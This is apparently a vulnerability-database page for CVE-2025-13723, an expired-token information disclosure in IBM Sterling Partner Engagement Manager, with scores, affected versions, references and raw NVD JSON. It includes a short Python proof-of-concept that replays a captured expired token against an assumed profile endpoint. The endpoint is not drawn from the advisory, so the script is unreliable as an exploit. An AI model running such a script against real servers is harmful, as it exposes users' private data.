CVE-2025-13723

Description

IBM Sterling Partner Engagement Manager 6.2.3.0 through 6.2.3.5 and 6.2.4.0 through 6.2.4.2 could allow an attacker to obtain sensitive user information using an expired access token

CVSS Details

CVSS Score

5.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:ibm:sterling_partner_engagement_manager:*:*:*:*:essentials:*:*:* - VULNERABLE

cpe:2.3:a:ibm:sterling_partner_engagement_manager:*:*:*:*:standard:*:*:* - VULNERABLE

cpe:2.3:a:ibm:sterling_partner_engagement_manager:*:*:*:*:essentials:*:*:* - VULNERABLE

cpe:2.3:a:ibm:sterling_partner_engagement_manager:*:*:*:*:standard:*:*:* - VULNERABLE

cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:* - NOT VULNERABLE

IBM Sterling Partner Engagement Manager 6.2.3.0 - 6.2.3.5

IBM Sterling Partner Engagement Manager 6.2.4.0 - 6.2.4.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-13723 PoC - Expired Token Information Disclosure
# Target: IBM Sterling Partner Engagement Manager
# Affected Versions: 6.2.3.0-6.2.3.5, 6.2.4.0-6.2.4.2

import requests
import time
import json

TARGET_URL = "https://target-server.example.com"
VULN_ENDPOINT = "/api/v1/user/profile"

def exploit_expired_token():
    """
    Simulate obtaining and using an expired access token
    In real scenario, token would be captured from legitimate user session
    """
    headers = {
        "Authorization": "Bearer <expired_access_token>",
        "Content-Type": "application/json"
    }
    
    # Attempt to access protected endpoint with expired token
    response = requests.get(
        f"{TARGET_URL}{VULN_ENDPOINT}",
        headers=headers,
        verify=False,
        timeout=30
    )
    
    print(f"[*] Status Code: {response.status_code}")
    print(f"[*] Response: {response.text}")
    
    # If token is still accepted (vulnerability present), sensitive data is leaked
    if response.status_code == 200:
        data = response.json()
        print("[!] VULNERABLE: Expired token was accepted!")
        print(f"[!] Leaked user data: {json.dumps(data, indent=2)}")
        return True
    else:
        print("[*] NOT VULNERABLE: Token properly rejected")
        return False

if __name__ == "__main__":
    print("CVE-2025-13723 PoC")
    print("=" * 50)
    exploit_expired_token()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-13723
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-13723
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-13723/
[4] VulDB https://vuldb.com/cve/CVE-2025-13723
[5] https://www.ibm.com/support/pages/node/7263391

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-13723", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:53:48.673", "lastModified": "2026-03-18T19:18:28.380", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "IBM Sterling Partner Engagement Manager 6.2.3.0 through 6.2.3.5 and 6.2.4.0 through 6.2.4.2 could allow an attacker to obtain sensitive user information using an expired access token"}, {"lang": "es", "value": "IBM Sterling Partner Engagement Manager 6.2.3.0 a 6.2.3.5 y 6.2.4.0 a 6.2.4.2 podría permitir a un atacante obtener información sensible del usuario utilizando un token de acceso caducado."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-324"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ibm:sterling_partner_engagement_manager:*:*:*:*:essentials:*:*:*", "versionStartIncluding": "6.2.3", "versionEndExcluding": "6.2.3.6", "matchCriteriaId": "687DC91A-7A4C-4FF2-8E23-65C8CDC5F52D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:sterling_partner_engagement_manager:*:*:*:*:standard:*:*:*", "versionStartIncluding": "6.2.3", "versionEndExcluding": "6.2.3.6", "matchCriteriaId": "7D427503-5EF4-485A-8073-C6C0B5723C2A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:sterling_partner_engagement_manager:*:*:*:*:essentials:*:*:*", "versionStartIncluding": "6.2.4", "versionEndExcluding": "6.2.4.3", "matchCriteriaId": "AB87CB0E-55B9-4C72-A592-C7E162A10C63"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:sterling_partner_engagement_manager:*:*:*:*:standard:*:*:*", "versionStartIncluding": "6.2.4", "versionEndExcluding": "6.2.4.3", "matchCriteriaId": "C07A609D-EF2B-423D-8006-B75E33C858D8"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*", "matchCriteriaId": "703AF700-7A70-47E2-BC3A-7FD03B3CA9C1"}]}]}], "references": [{"url": "https://www.ibm.com/support/pages/node/7263391", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}